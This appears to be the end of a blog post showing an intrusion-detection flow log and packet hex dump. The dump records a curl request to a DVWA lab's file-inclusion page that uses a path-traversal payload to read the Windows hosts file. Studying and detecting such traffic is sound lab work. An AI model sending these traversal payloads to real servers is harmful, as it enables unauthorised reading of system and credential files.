FLOW:              to_server: TRUE, to_client: FALSE
FLOW Start TS:     06/07/2023-14:36:45.810580
FLOW PKTS TODST:   3
FLOW PKTS TOSRC:   1
FLOW Total Bytes:  404
FLOW IPONLY SET:   TOSERVER: TRUE, TOCLIENT: TRUE
FLOW ACTION:       DROP: FALSE
FLOW NOINSPECTION: PACKET: FALSE, PAYLOAD: FALSE, APP_LAYER: FALSE
FLOW APP_LAYER:    DETECTED: TRUE, PROTO 1
PACKET LEN:        210
PACKET:
 0000  08 00 27 88 B8 34 08 00  27 DB 96 6A 08 00 45 00   ..'..4.. '..j..E.
 0010  00 C4 75 E1 40 00 40 06  AF 7E 0A 00 00 6B 0A 00   ..u.@.@. .~...k..
 0020  00 6A E8 40 00 50 A3 37  1A B9 8C EB C1 6C 50 18   .j.@.P.7 .....lP.
 0030  01 F6 15 8B 00 00 47 45  54 20 2F 64 76 77 61 2F   ......GE T /dvwa/
 0040  76 75 6C 6E 65 72 61 62  69 6C 69 74 69 65 73 2F   vulnerab ilities/
 0050  66 69 2F 3F 70 61 67 65  3D 2E 2E 2F 2E 2E 2F 2E   fi/?page =../../.
 0060  2E 2F 2E 2E 2F 2E 2E 2F  2E 2E 2F 77 69 6E 64 6F   ./../../ ../windo
 0070  77 73 2F 73 79 73 74 65  6D 33 32 2F 64 72 69 76   ws/syste m32/driv
 0080  65 72 73 2F 65 74 63 2F  68 6F 73 74 73 20 48 54   ers/etc/ hosts HT
 0090  54 50 2F 31 2E 31 0D 0A  48 6F 73 74 3A 20 31 30   TP/1.1.. Host: 10
 00A0  2E 30 2E 30 2E 31 30 36  0D 0A 55 73 65 72 2D 41   .0.0.106 ..User-A
 00B0  67 65 6E 74 3A 20 63 75  72 6C 2F 37 2E 38 38 2E   gent: cu rl/7.88.
 00C0  31 0D 0A 41 63 63 65 70  74 3A 20 2A 2F 2A 0D 0A   1..Accep t: */*..
 00D0  0D 0A                                              ..
...

Nothing else to look at here.

Hope you enjoyed the posts in this series:
Posted by at No comments:
Labels: , , , , , , ,
Subscribe to: Posts (Atom)